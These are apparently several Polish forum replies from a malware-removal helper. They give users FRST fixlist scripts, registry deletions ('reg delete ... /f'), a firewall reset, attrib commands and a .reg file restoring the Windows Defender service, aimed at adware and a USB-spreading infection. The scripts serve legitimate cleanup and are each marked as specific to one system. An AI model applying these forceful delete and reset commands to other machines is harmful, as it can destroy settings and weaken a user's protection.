HKU\S-1-5-21-2440634791-3158896077-4223476700-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com HKU\S-1-5-21-2440634791-3158896077-4223476700-1001\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab FF Plugin: @nexon.net/NxGame -> C:\ProgramData\NexonUS\NGM\npNxGameUS.dll No File FF Plugin: @pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll No File FF HKLM\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\Firefox\Ext FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird C:\Program Files\mozilla firefox\plugins C:\ProgramData\Temp Folder: C:\Device Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść Firefox z adware: menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. menu Historia > Wyczyść historię przeglądania 3. Akcje związane z Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Odinstaluj całkowicie przeglądarkę. Przy deinstalacji zaznacz opcję Usuń także dane przeglądarki. 4. Zrób nowy log FRST z opcji Scan (zaznacz ponownie pole Addition, by powstały dwa logi). Dołącz też plik fixlog.txt. Opisz jakie są rezultaty w/w działań.

Jeszcze poprawki - puste wpisy w Autostarcie (ten "A PDF Page Crop 4.7. keygen" to komponent adware Multiplug) oraz kilka innych drobnostek. Startup: C:\Users\Morgana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\A PDF Page Crop 4.7. keygen.lnk [2015-04-24] ShortcutTarget: A PDF Page Crop 4.7. keygen.lnk -> C:\ProgramData\{bcd51f8f-4edb-3448-bcd5-51f8f4ed7e3d}\A PDF Page Crop 4.7. keygen.exe (No File) Startup: C:\Users\Morgana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wysyłanie do programu OneNote.lnk [2015-05-06] ShortcutTarget: Wysyłanie do programu OneNote.lnk -> C:\Program Files\Microsoft Office 15\root\office15\ONENOTEM.EXE (No File) 1. Przez Panel sterowania odinstaluj program typu "PUP" - FileViewPro. Następnie wyczyść Firefox: menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. menu Historia > Wyczyść historię przeglądania 2. Przywracanie systemu jest wyłączone (prawdopodobnie przez malware): ==================== Restore Points ========================= ATTENTION: System Restore is disabled Wejdź do interfejsu konfiguracji Przywracania: KLIK. Włącz Ochronę dla dysku C. 3. Pobierz ponownie FRST. Otwórz Notatnik i wklej w nim: Startup: C:\Users\Morgana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\A PDF Page Crop 4.7. keygen.lnk [2015-04-24] Startup: C:\Users\Morgana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wysyłanie do programu OneNote.lnk [2015-05-06] HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\VDWFP => ""="Driver" SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg query "HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes" /s Reg: reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes" /s Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Przedstaw wynikowy fixlog.txt.

Wymagane poprawki, bo adware nie zostało usunięte - nadal w systemie aktywne usługi / sterownik adware WordAnchor 1.10.0.19 z grupy Vitruvian oraz polityki Google. I jeszcze dodam, że WordAnchor 1.10.0.19 nabyłeś z serwisu dobreprogramy.pl przy udziale śmiecia "Asystent pobierania": KLIK. Na dysku widać poniższy plik "Asystenta" i zaraz po nim utworzone komponenty adware: C:\Users\user\Downloads\Photostage-Slideshow(17952)-dp.exe Akcje do wdrożenia: 1. Przez Panel sterowania odinstaluj adware WordAnchor 1.10.0.19. Przy okazji, pozbądź się także starych niezbezpiecznych wersji (luki): Adobe Flash Player 10 ActiveX, Adobe Reader 9.1.2 - Polish, Java™ 6 Update 18, Java 7 Update 11, OpenOffice.org 3.2 oraz zbędnego Spybot - Search & Destroy. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: GroupPolicy: Group Policy on Chrome detected CHR HKLM\SOFTWARE\Policies\Google: Policy restriction HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction HKU\S-1-5-21-356970189-196760685-2834952327-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com U5 AppMgmt; C:\Windows\system32\svchost.exe [20992 2009-07-14] (Microsoft Corporation) S3 catchme; \??\C:\Users\user\AppData\Local\Temp\catchme.sys [X] FF HKLM\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 FF HKU\S-1-5-21-356970189-196760685-2834952327-1000\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 C:\Users\user\Downloads\*(*)-dp*.exe Reg: reg delete HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I /f Reg: reg delete HKCU\Software\dobreprogramy /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Firefox: menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. menu Historia > Wyczyść historię przeglądania 4. Wyczyść Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Ustawienia > Osoby > usuń wszystkie profile i utwórz nowy Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 5. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

Infekcji tu było kilka - jedna z nich nie została usunięta, nadal w starcie jest wpis malware msqoer.exe odpowiadający za tworzenie takich obiektów na pendrive. Apropos tej części instrukcji: Te foldery nie miały widocznej nazwy, ich nazwa to "spacja" (wizualnie "bez nazwy") a nie "Removable Drive". Foldery te nadal są na wszystkich urządzeniach i to w formie ukrytej: [28/05/2015 - 09:11:38 | SHD] - H:\ [23/06/2015 - 21:38:06 | SHD] - I:\ [17/06/2015 - 13:40:34 | SHD] - J:\ Kolejne akcje: 1. Zakładam, że dyski H, I, J są mapowane pod tymi samymi literami. Otwórz Notatnik i wklej w nim: CloseProcesses: HKLM\...\Policies\Explorer\Run: [1817807662] => C:\ProgramData\msqoer.exe [100130816 2010-11-21] (Redtail Technology) HKLM\...\Run: [Nvtmru] => "C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe" CHR HKU\S-1-5-21-2773447309-4165682760-850709354-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fnelgfmpooffemibikhmcklfnnimgijo] - C:\Users\Piotr\AppData\Local\CRE\fnelgfmpooffemibikhmcklfnnimgijo.crx [2014-04-01] CHR HKLM-x32\...\Chrome\Extension: [fnelgfmpooffemibikhmcklfnnimgijo] - C:\Users\Piotr\AppData\Local\CRE\fnelgfmpooffemibikhmcklfnnimgijo.crx [2014-04-01] C:\Program Files\DSHJYB1M.exe C:\Program Files (x86)\is.dat C:\Program Files (x86)\uik.dat C:\ProgramData\msivxdc.exe C:\ProgramData\msqoer.exe C:\Users\Piotr\AppData\Local\CRE RemoveDirectory: J:\Autorun.inf CMD: attrib /d /s -s -h H:\* CMD: attrib /d /s -s -h I:\* CMD: attrib /d /s -s -h J:\* CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Po wyżej wymienionej akcji wejdź na dyski H, I, J - z folderów "bez nazwy" przenieś wszystkie dane poziom wyżej, a foldery te skasuj. 3. Jedna z infekcji skasowała usługę Windows Defender. Otwórz Notatnik i wklej w nim: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinDefend] "DisplayName"="@%ProgramFiles%\\Windows Defender\\MsMpRes.dll,-103" "ErrorControl"=dword:00000001 "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\ 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\ 00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\ 6b,00,20,00,73,00,65,00,63,00,73,00,76,00,63,00,73,00,00,00 "Start"=dword:00000002 "Type"=dword:00000020 "Description"="@%ProgramFiles%\\Windows Defender\\MsMpRes.dll,-1176" "DependOnService"=hex(7):52,00,70,00,63,00,53,00,73,00,00,00,00,00 "ObjectName"="LocalSystem" "ServiceSidType"=dword:00000001 "RequiredPrivileges"=hex(7):53,00,65,00,49,00,6d,00,70,00,65,00,72,00,73,00,6f,\ 00,6e,00,61,00,74,00,65,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,\ 65,00,00,00,53,00,65,00,42,00,61,00,63,00,6b,00,75,00,70,00,50,00,72,00,69,\ 00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,52,00,65,00,73,00,\ 74,00,6f,00,72,00,65,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,\ 00,00,00,53,00,65,00,44,00,65,00,62,00,75,00,67,00,50,00,72,00,69,00,76,00,\ 69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,43,00,68,00,61,00,6e,00,67,\ 00,65,00,4e,00,6f,00,74,00,69,00,66,00,79,00,50,00,72,00,69,00,76,00,69,00,\ 6c,00,65,00,67,00,65,00,00,00,53,00,65,00,53,00,65,00,63,00,75,00,72,00,69,\ 00,74,00,79,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,\ 53,00,65,00,53,00,68,00,75,00,74,00,64,00,6f,00,77,00,6e,00,50,00,72,00,69,\ 00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,49,00,6e,00,63,00,\ 72,00,65,00,61,00,73,00,65,00,51,00,75,00,6f,00,74,00,61,00,50,00,72,00,69,\ 00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,41,00,73,00,73,00,\ 69,00,67,00,6e,00,50,00,72,00,69,00,6d,00,61,00,72,00,79,00,54,00,6f,00,6b,\ 00,65,00,6e,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,\ 00,00 "DelayedAutoStart"=dword:00000001 "FailureActions"=hex:80,51,01,00,00,00,00,00,00,00,00,00,03,00,00,00,14,00,00,\ 00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00,00,00,00,00,00,00,00,00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinDefend\Parameters] "ServiceDllUnloadOnStop"=dword:00000001 "ServiceDll"=hex(2):25,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,46,00,69,\ 00,6c,00,65,00,73,00,25,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,77,00,73,00,\ 20,00,44,00,65,00,66,00,65,00,6e,00,64,00,65,00,72,00,5c,00,6d,00,70,00,73,\ 00,76,00,63,00,2e,00,64,00,6c,00,6c,00,00,00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinDefend\Security] "Security"=hex:01,00,14,80,dc,00,00,00,e8,00,00,00,14,00,00,00,30,00,00,00,02,\ 00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\ 00,00,02,00,ac,00,06,00,00,00,00,00,28,00,ff,01,0f,00,01,06,00,00,00,00,00,\ 05,50,00,00,00,b5,89,fb,38,19,84,c2,cb,5c,6c,23,6d,57,00,77,6e,c0,02,64,87,\ 00,0b,28,00,00,00,00,10,01,06,00,00,00,00,00,05,50,00,00,00,b5,89,fb,38,19,\ 84,c2,cb,5c,6c,23,6d,57,00,77,6e,c0,02,64,87,00,00,14,00,fd,01,02,00,01,01,\ 00,00,00,00,00,05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,\ 05,20,00,00,00,20,02,00,00,00,00,14,00,9d,01,02,00,01,01,00,00,00,00,00,05,\ 04,00,00,00,00,00,14,00,9d,01,02,00,01,01,00,00,00,00,00,05,06,00,00,00,01,\ 01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinDefend\TriggerInfo] [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinDefend\TriggerInfo\0] "Type"=dword:00000005 "Action"=dword:00000001 "GUID"=hex:e6,ca,9f,65,db,5b,a9,4d,b1,ff,ca,2a,17,8d,46,e0 Z menu Notatnika > Plik > Zapisz jako > Ustaw rozszerzenie na Wszystkie pliki > Zapisz jako FIX.REG Kliknij prawym na plik i z menu wybierz opcję Scal. Potwierdź import do rejestru. Zresetuj system. 4. Przywracanie systemu jest wyłączone: ==================== Restore Points ========================= ATTENTION: System Restore is disabled Wejdź do Panelu sterowania do sekcji Przywracania systemu i włącz Ochronę dla dysku C. 5. Zrób nowe logi: FRST z opcji Scan (bez Addition i Shortcut), Farbar Service Scanner oraz USBFix z opcji Listing. Dołącz też plik fixlog.txt.